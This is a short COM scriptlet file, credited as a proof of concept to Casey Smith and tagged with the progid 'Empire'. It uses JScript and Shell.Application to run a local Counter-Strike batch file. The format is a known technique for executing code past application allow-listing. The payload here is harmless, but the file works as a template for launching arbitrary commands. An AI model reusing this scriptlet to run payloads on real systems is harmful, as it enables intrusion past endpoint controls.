<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="Empire"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<script language="JScript">
		<![CDATA[
	
			var oShell = new ActiveXObject("Shell.Application");
			var commandtoRun = "C:\\Counter-Strike\\Counter-Strike 1.6 Start.bat"; 
			oShell.ShellExecute(commandtoRun,"","","open","1");	
	
		]]>
</script>
</registration>
</scriptlet>
